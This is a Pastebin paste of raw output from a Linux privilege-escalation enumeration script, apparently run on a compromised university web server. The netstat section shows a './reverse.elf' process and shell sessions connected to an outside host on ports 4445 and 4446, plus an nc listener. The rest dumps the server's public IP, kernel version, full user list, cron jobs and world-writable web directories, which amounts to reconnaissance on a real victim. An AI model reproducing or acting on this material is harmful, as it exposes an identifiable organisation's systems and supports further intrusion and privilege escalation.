Advertisement
Guest User

Untitled

a guest
Nov 29th, 2017
1,088
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 306.59 KB | None | 0 0
  1. =================================================================================================
  2. LINUX PRIVILEGE ESCALATION CHECKER
  3. =================================================================================================
  4.  
  5. [*] GETTING BASIC SYSTEM INFO...
  6.  
  7. [+] Kernel
  8. Linux version 3.10.0-514.10.2.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.5 20150623 (Red Hat 4.8.5-11) (GCC) ) #1 SMP Fri Mar 3 00:04:05 UTC 2017
  9.  
  10. [+] Hostname
  11. servertest
  12.  
  13. [+] Operating System
  14. \S
  15. Kernel \r on an \m
  16.  
  17. [*] GETTING NETWORKING INFO...
  18.  
  19. [+] Interfaces
  20. ens32: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
  21. inet 150.214.91.122 netmask 255.255.255.0 broadcast 150.214.91.255
  22. inet6 fe80::250:56ff:fe84:41cb prefixlen 64 scopeid 0x20<link>
  23. ether 00:50:56:84:41:cb txqueuelen 1000 (Ethernet)
  24. RX packets 1758525162 bytes 237635980617 (221.3 GiB)
  25. RX errors 0 dropped 229199 overruns 0 frame 0
  26. TX packets 8562477403 bytes 22999852696631 (20.9 TiB)
  27. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  28. lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
  29. inet 127.0.0.1 netmask 255.0.0.0
  30. inet6 ::1 prefixlen 128 scopeid 0x10<host>
  31. loop txqueuelen 1 (Local Loopback)
  32. RX packets 39811102 bytes 18998639641 (17.6 GiB)
  33. RX errors 0 dropped 0 overruns 0 frame 0
  34. TX packets 39811102 bytes 18998639641 (17.6 GiB)
  35. TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
  36.  
  37. [+] Netstat
  38. Active Internet connections (servers and established)
  39. Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
  40. tcp 0 0 0.0.0.0:110 0.0.0.0:* LISTEN -
  41. tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
  42. tcp 0 0 0.0.0.0:143 0.0.0.0:* LISTEN -
  43. tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN -
  44. tcp 0 0 0.0.0.0:1234 0.0.0.0:* LISTEN 11713/nc
  45. tcp 0 0 150.214.91.122:53 0.0.0.0:* LISTEN -
  46. tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN -
  47. tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
  48. tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN -
  49. tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN -
  50. tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN -
  51. tcp 0 0 0.0.0.0:20000 0.0.0.0:* LISTEN -
  52. tcp 0 0 0.0.0.0:993 0.0.0.0:* LISTEN -
  53. tcp 0 0 0.0.0.0:10050 0.0.0.0:* LISTEN -
  54. tcp 0 0 0.0.0.0:995 0.0.0.0:* LISTEN -
  55. tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN -
  56. tcp 0 0 0.0.0.0:587 0.0.0.0:* LISTEN -
  57. tcp 961 0 150.214.91.122:40948 92.56.216.153:4445 CLOSE_WAIT 10469/sh
  58. tcp 0 0 150.214.91.122:40980 92.56.216.153:4446 ESTABLISHED 10881/./reverse.elf
  59. tcp 241 0 150.214.91.122:41044 92.56.216.153:4445 CLOSE_WAIT 10856/sh
  60. tcp6 0 0 :::110 :::* LISTEN -
  61. tcp6 0 0 :::111 :::* LISTEN -
  62. tcp6 0 0 :::143 :::* LISTEN -
  63. tcp6 0 0 :::80 :::* LISTEN -
  64. tcp6 0 0 :::1234 :::* LISTEN 11713/nc
  65. tcp6 0 0 :::21 :::* LISTEN -
  66. tcp6 0 0 :::53 :::* LISTEN -
  67. tcp6 0 0 :::22 :::* LISTEN -
  68. tcp6 0 0 ::1:5432 :::* LISTEN -
  69. tcp6 0 0 ::1:953 :::* LISTEN -
  70. tcp6 0 0 :::25 :::* LISTEN -
  71. tcp6 0 0 :::443 :::* LISTEN -
  72. tcp6 0 0 :::993 :::* LISTEN -
  73. tcp6 0 0 :::995 :::* LISTEN -
  74. tcp6 0 0 :::587 :::* LISTEN -
  75. tcp6 0 0 150.214.91.122:80 81.61.224.35:60494 ESTABLISHED -
  76. tcp6 0 0 150.214.91.122:80 81.61.224.35:60496 ESTABLISHED -
  77. tcp6 0 0 150.214.91.122:80 81.61.224.35:60497 ESTABLISHED -
  78. tcp6 0 0 150.214.91.122:80 81.61.224.35:60493 ESTABLISHED -
  79. tcp6 0 0 150.214.91.122:80 81.61.224.35:60495 ESTABLISHED -
  80. tcp6 0 0 150.214.91.122:80 81.61.224.35:60498 ESTABLISHED -
  81. udp 0 0 0.0.0.0:40069 0.0.0.0:* -
  82. udp 0 0 0.0.0.0:20000 0.0.0.0:* -
  83. udp 0 0 150.214.91.122:53 0.0.0.0:* -
  84. udp 0 0 127.0.0.1:53 0.0.0.0:* -
  85. udp 0 0 0.0.0.0:5353 0.0.0.0:* -
  86. udp 0 0 0.0.0.0:10000 0.0.0.0:* -
  87. udp6 0 0 ::1:48145 ::1:48145 ESTABLISHED -
  88. udp6 0 0 :::53 :::* -
  89.  
  90. [+] Route
  91. Kernel IP routing table
  92. Destination Gateway Genmask Flags Metric Ref Use Iface
  93. default gateway 0.0.0.0 UG 100 0 0 ens32
  94. 150.214.91.0 0.0.0.0 255.255.255.0 U 100 0 0 ens32
  95.  
  96. [*] GETTING FILESYSTEM INFO...
  97.  
  98. [+] Mount results
  99. /dev/mapper/centos-root on / type xfs (rw,relatime,attr2,inode64,noquota)
  100. devtmpfs on /dev type devtmpfs (rw,nosuid,size=3994672k,nr_inodes=998668,mode=755)
  101. tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
  102. devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
  103. hugetlbfs on /dev/hugepages type hugetlbfs (rw,relatime)
  104. mqueue on /dev/mqueue type mqueue (rw,relatime)
  105. proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
  106. systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=32,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
  107. binfmt_misc on /proc/sys/fs/binfmt_misc type binfmt_misc (rw,relatime)
  108. sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
  109. securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
  110. tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
  111. cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/usr/lib/systemd/systemd-cgroups-agent,name=systemd)
  112. cgroup on /sys/fs/cgroup/pids type cgroup (rw,nosuid,nodev,noexec,relatime,pids)
  113. cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpuacct,cpu)
  114. cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_prio,net_cls)
  115. cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
  116. cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
  117. cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
  118. cgroup on /sys/fs/cgroup/memory type cgroup (rw,nosuid,nodev,noexec,relatime,memory)
  119. cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
  120. cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
  121. cgroup on /sys/fs/cgroup/hugetlb type cgroup (rw,nosuid,nodev,noexec,relatime,hugetlb)
  122. pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
  123. configfs on /sys/kernel/config type configfs (rw,relatime)
  124. debugfs on /sys/kernel/debug type debugfs (rw,relatime)
  125. tmpfs on /run type tmpfs (rw,nosuid,nodev,mode=755)
  126. tmpfs on /run/user/0 type tmpfs (rw,nosuid,nodev,relatime,size=801084k,mode=700)
  127. /dev/sdb1 on /home type ext4 (rw,relatime,quota,usrquota,grpquota,data=ordered)
  128. /dev/sda1 on /boot type xfs (rw,relatime,attr2,inode64,noquota)
  129. /dev/mapper/centos-root on /tmp type xfs (rw,relatime,attr2,inode64,noquota)
  130. /dev/mapper/centos-root on /var/tmp type xfs (rw,relatime,attr2,inode64,noquota)
  131.  
  132. [+] fstab entries
  133. #
  134. # /etc/fstab
  135. # Created by anaconda on Thu Mar 5 09:25:05 2015
  136. #
  137. # Accessible filesystems, by reference, are maintained under '/dev/disk'
  138. # See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info
  139. #
  140. /dev/mapper/centos-root / xfs seclabel,inode64,relatime,attr2,grpquota,usrquota,rw 0 1
  141. UUID=d6fe1c31-2352-43a4-ae6a-27db05987d1f /boot xfs defaults 1 2
  142. /dev/mapper/centos-swap swap swap defaults 0 0
  143. LABEL=/home /home ext4 usrquota,grpquota 0 2
  144.  
  145. [+] Scheduled cron jobs
  146. -rw------- 1 root root 0 Mar 31 2016 /etc/cron.deny
  147. -rw-r--r--. 1 root root 451 Jun 10 2014 /etc/crontab
  148. /etc/cron.d:
  149. total 28
  150. drwxr-xr-x. 2 root root 70 Apr 1 2017 .
  151. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  152. -rw-r--r-- 1 root root 128 Mar 31 2016 0hourly
  153. -rw------- 1 root root 203 Mar 30 2016 clamav-update
  154. -rw-r--r-- 1 root root 2481 Apr 1 2017 mailman
  155. -rw-r--r-- 1 root root 459 Jun 24 2015 sa-update
  156. /etc/cron.daily:
  157. total 28
  158. drwxr-xr-x. 2 root root 72 Feb 27 2017 .
  159. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  160. -rwxr-xr-x 1 root root 211 Jan 12 2017 00webalizer
  161. -rwx------ 1 root root 219 Nov 5 2016 logrotate
  162. -rwxr-xr-x. 1 root root 618 Mar 17 2014 man-db.cron
  163. -rwx------ 1 root root 208 Nov 4 2016 mlocate
  164. /etc/cron.hourly:
  165. total 20
  166. drwxr-xr-x. 2 root root 35 Jan 19 2017 .
  167. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  168. -rwxr-xr-x 1 root root 392 Mar 31 2016 0anacron
  169. -rwxr-x---. 1 root root 174 Mar 5 2015 awstats
  170. /etc/cron.monthly:
  171. total 12
  172. drwxr-xr-x. 2 root root 6 Jun 10 2014 .
  173. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  174. /etc/cron.weekly:
  175. total 12
  176. drwxr-xr-x. 2 root root 6 Jun 10 2014 .
  177. drwxr-xr-x. 100 root root 8192 Oct 31 20:12 ..
  178.  
  179. [+] Writable cron dirs
  180.  
  181.  
  182. [*] ENUMERATING USER AND ENVIRONMENTAL INFO...
  183.  
  184. [+] Logged in User Activity
  185. 22:24:03 up 233 days, 21:59, 0 users, load average: 0.04, 0.21, 0.30
  186. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  187.  
  188. [+] Super Users Found:
  189. root
  190.  
  191. [+] Environment
  192. USER=programacion
  193. PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/system/bin:/system/sbin:/system/xbin
  194. _=/usr/bin/env
  195. PWD=/tmp
  196. LANG=C
  197. SHLVL=3
  198. HOME=/home/servertest
  199.  
  200. [+] Root and current user history (depends on privs)
  201. -rw------- 1 programacion programacion 1533 Nov 20 21:45 /home/servertest/.bash_history
  202.  
  203. [+] Sudoers (privileged)
  204.  
  205. [+] All users
  206. root:x:0:0:root:/root:/bin/bash
  207. bin:x:1:1:bin:/bin:/sbin/nologin
  208. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  209. adm:x:3:4:adm:/var/adm:/sbin/nologin
  210. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  211. sync:x:5:0:sync:/sbin:/bin/sync
  212. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  213. halt:x:7:0:halt:/sbin:/sbin/halt
  214. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  215. operator:x:11:0:operator:/root:/sbin/nologin
  216. games:x:12:100:games:/usr/games:/sbin/nologin
  217. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  218. nobody:x:99:99:Nobody:/:/sbin/nologin
  219. dbus:x:81:81:System message bus:/:/sbin/nologin
  220. polkitd:x:999:998:User for polkitd:/:/sbin/nologin
  221. avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin
  222. avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
  223. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  224. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  225. apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
  226. webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
  227. mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
  228. dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
  229. dovenull:x:998:997:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
  230. mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
  231. postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
  232. named:x:25:25:Named:/var/named:/sbin/nologin
  233. saslauth:x:997:76:"Saslauthd user":/run/saslauthd:/sbin/nologin
  234. clamupdate:x:996:996:Clamav database update user:/var/lib/clamav:/sbin/nologin
  235. clamscan:x:995:995:Clamav scanner user:/:/sbin/nologin
  236. tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
  237. epsalgeciras:x:508:508:Escuela Politecnica Superior de Algeciras:/home/epsalgeciras:/bin/sh
  238. zabbix:x:506:3:Zabbix agents owner:/opt/zabbix:/bin/bash
  239. imeymat:x:518:518:Instituto de Microscopía Electrónica y Materiales:/home/imeymat:/bin/sh
  240. systemd-bus-proxy:x:505:506:systemd Bus Proxy:/:/sbin/nologin
  241. systemd-network:x:504:505:systemd Network Management:/:/sbin/nologin
  242. master:x:523:523::/home/master:/bin/sh
  243. gradosindustriales:x:528:528:Grados Industriales:/home/gradosindustriales:/bin/sh
  244. ccsociales:x:531:531:Clone of Centro UCA 1:/home/ccsociales:/bin/sh
  245. ciencias:x:534:533:Web de Ciencias:/home/ciencias:/bin/sh
  246. mario.ciencias:x:534:533:Mario:/home/ciencias/public_html:/bin/false
  247. default:x:536:535:El servidor predeterminado:/home/default:/bin/sh
  248. rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
  249. iuila:x:539:538::/home/iuila:/bin/sh
  250. enfyfis:x:541:540:Enfermería y Fisioterapia:/home/enfyfis:/bin/sh
  251. indess:x:542:541::/home/indess:/bin/sh
  252. caiv:x:543:542:Centro Andaluz de Investigaciones Vitivinícolas:/home/caiv:/bin/sh
  253. epsalgeciras1:x:547:546:Clone of Escuela Politecnica Superior de Algeciras:/home/epsalgeciras1:/bin/sh
  254. economicas:x:550:549:Facultad de Ciencias Económicas y Empresariales:/home/economicas:/bin/sh
  255. programacion:x:553:552::/home/servertest:/bin/sh
  256. servertest:x:1000:552::/home/servertest:/bin/bash
  257. masingind:x:556:554::/home/masingind:/bin/sh
  258.  
  259. [+] Current User
  260. programacion
  261.  
  262. [+] Current User ID
  263. uid=553(programacion) gid=552(programacion) groups=552(programacion)
  264.  
  265. [*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
  266.  
  267. [+] World Writeable Directories for User/Group 'Root'
  268. drwxrwxrwt 2 root root 40 Apr 1 2017 /dev/mqueue
  269. drwxrwxrwt 2 root root 40 Apr 1 2017 /dev/shm
  270. drwxrwxrwt 2 root root 4096 Nov 20 22:24 /tmp
  271. drwxrwxrwt 2 root root 6 Oct 27 08:41 /var/tmp
  272. drwxrwxrwt 2 root root 4096 Mar 5 2015 /home/virtualmin-autoreply
  273.  
  274. [+] World Writeable Directories for Users other than Root
  275. drwxrwxrwx 2 programacion programacion 4096 Jul 7 22:07 /home/servertest/public_html/.tmb
  276. drwxrwxrwx 2 programacion programacion 4096 Oct 1 2014 /home/servertest/public_html/wp-content/backup-db
  277. drwxrwxrwx 4 programacion programacion 4096 Sep 11 09:44 /home/servertest/public_html/wp-content/uploads/filebase
  278. drwxrwxrwx 2 programacion programacion 4096 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/.tmp
  279. drwxrwxrwx 2 programacion programacion 4096 May 18 2016 /home/servertest/public_html/wp-content/uploads/filebase/fichasdocentes
  280. drwxrwxrwx 2 programacion programacion 4096 Nov 3 2014 /home/servertest/public_html/wp-content/uploads/backwpup-8adfde-logs
  281.  
  282. [+] World Writable Files
  283. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/hugetlb/cgroup.event_control
  284. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/user.slice/cgroup.event_control
  285. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/dovecot.service/cgroup.event_control
  286. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/webmin.service/cgroup.event_control
  287. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/postfix.service/cgroup.event_control
  288. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/rsyslog.service/cgroup.event_control
  289. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/mailman.service/cgroup.event_control
  290. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/postgresql.service/cgroup.event_control
  291. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/system-getty.slice/cgroup.event_control
  292. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/NetworkManager.service/cgroup.event_control
  293. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/systemd-logind.service/cgroup.event_control
  294. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/dbus.service/cgroup.event_control
  295. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/saslauthd.service/cgroup.event_control
  296. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/vmware-tools.service/cgroup.event_control
  297. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/avahi-daemon.service/cgroup.event_control
  298. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/auditd.service/cgroup.event_control
  299. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/systemd-journald.service/cgroup.event_control
  300. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/system.slice/cgroup.event_control
  301. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/devices/cgroup.event_control
  302. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/perf_event/cgroup.event_control
  303. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/memory/cgroup.event_control
  304. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/cpuset/cgroup.event_control
  305. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/blkio/cgroup.event_control
  306. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/freezer/cgroup.event_control
  307. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/net_cls,net_prio/cgroup.event_control
  308. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/cpu,cpuacct/cgroup.event_control
  309. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/pids/cgroup.event_control
  310. --w--w--w- 1 root root 0 Nov 20 21:00 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-150671.scope/cgroup.event_control
  311. --w--w--w- 1 root root 0 Sep 8 11:23 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-103530.scope/cgroup.event_control
  312. --w--w--w- 1 root root 0 Jul 10 11:40 /sys/fs/cgroup/systemd/user.slice/user-0.slice/session-64611.scope/cgroup.event_control
  313. --w--w--w- 1 root root 0 Jul 6 11:52 /sys/fs/cgroup/systemd/user.slice/user-0.slice/cgroup.event_control
  314. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/user.slice/cgroup.event_control
  315. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/httpd.service/cgroup.event_control
  316. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/mariadb.service/cgroup.event_control
  317. --w--w--w- 1 root root 0 Oct 27 08:41 /sys/fs/cgroup/systemd/system.slice/sshd.service/cgroup.event_control
  318. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/irqbalance.service/cgroup.event_control
  319. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/proftpd.service/cgroup.event_control
  320. --w--w--w- 1 root root 0 Jul 10 09:21 /sys/fs/cgroup/systemd/system.slice/firewalld.service/cgroup.event_control
  321. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/tuned.service/cgroup.event_control
  322. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/polkit.service/cgroup.event_control
  323. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/named.service/cgroup.event_control
  324. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/usermin.service/cgroup.event_control
  325. --w--w--w- 1 root root 0 Jul 10 09:20 /sys/fs/cgroup/systemd/system.slice/lvm2-lvmetad.service/cgroup.event_control
  326. --w--w--w- 1 root root 0 Jul 10 09:18 /sys/fs/cgroup/systemd/system.slice/systemd-udevd.service/cgroup.event_control
  327. --w--w--w- 1 root root 0 Jul 10 09:18 /sys/fs/cgroup/systemd/system.slice/crond.service/cgroup.event_control
  328. --w--w--w- 1 root root 0 Jul 6 11:54 /sys/fs/cgroup/systemd/system.slice/run-user-0.mount/cgroup.event_control
  329. --w--w--w- 1 root root 0 Jun 19 11:50 /sys/fs/cgroup/systemd/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
  330. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/kdump.service/cgroup.event_control
  331. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/zabbix.service/cgroup.event_control
  332. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/network.service/cgroup.event_control
  333. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dovecot.service/cgroup.event_control
  334. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/webmin.service/cgroup.event_control
  335. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/postfix.service/cgroup.event_control
  336. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rsyslog.service/cgroup.event_control
  337. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/mailman.service/cgroup.event_control
  338. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/postgresql.service/cgroup.event_control
  339. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/NetworkManager-wait-online.service/cgroup.event_control
  340. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/NetworkManager.service/cgroup.event_control
  341. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-dmesg.service/cgroup.event_control
  342. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-user-sessions.service/cgroup.event_control
  343. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-update-utmp.service/cgroup.event_control
  344. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dbus.service/cgroup.event_control
  345. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/vmware-tools.service/cgroup.event_control
  346. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/avahi-daemon.service/cgroup.event_control
  347. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-logind.service/cgroup.event_control
  348. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/saslauthd.service/cgroup.event_control
  349. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
  350. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/auditd.service/cgroup.event_control
  351. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-import-state.service/cgroup.event_control
  352. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/quotaon.service/cgroup.event_control
  353. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-quotacheck.service/cgroup.event_control
  354. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/home.mount/cgroup.event_control
  355. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/boot.mount/cgroup.event_control
  356. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/lvm2-monitor.service/cgroup.event_control
  357. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2did-dm\x2dname\x2dcentos\x2dswap.swap/cgroup.event_control
  358. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-dm\x2d0.swap/cgroup.event_control
  359. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2did-dm\x2duuid\x2dLVM\x2dJ7dZz4eTLW2UFHCRD37o3mIQ3cb9eRc7KOFxiMuBAdJZ4E6rHfysA3owGCuGU5kT.swap/cgroup.event_control
  360. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-disk-by\x2duuid-7c17174f\x2dabc6\x2d414c\x2d9225\x2d1aa89dc3d427.swap/cgroup.event_control
  361. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-centos-swap.swap/cgroup.event_control
  362. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
  363. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-journal-flush.service/cgroup.event_control
  364. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/rhel-readonly.service/cgroup.event_control
  365. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/dev-mapper-centos\x2dswap.swap/cgroup.event_control
  366. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
  367. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-random-seed.service/cgroup.event_control
  368. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-udev-trigger.service/cgroup.event_control
  369. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-remount-fs.service/cgroup.event_control
  370. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-sysctl.service/cgroup.event_control
  371. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/kmod-static-nodes.service/cgroup.event_control
  372. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/sys-kernel-config.mount/cgroup.event_control
  373. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-vconsole-setup.service/cgroup.event_control
  374. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/-.mount/cgroup.event_control
  375. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-fsck-root.service/cgroup.event_control
  376. --w--w--w- 1 root root 0 Apr 1 2017 /sys/fs/cgroup/systemd/system.slice/systemd-journald.service/cgroup.event_control
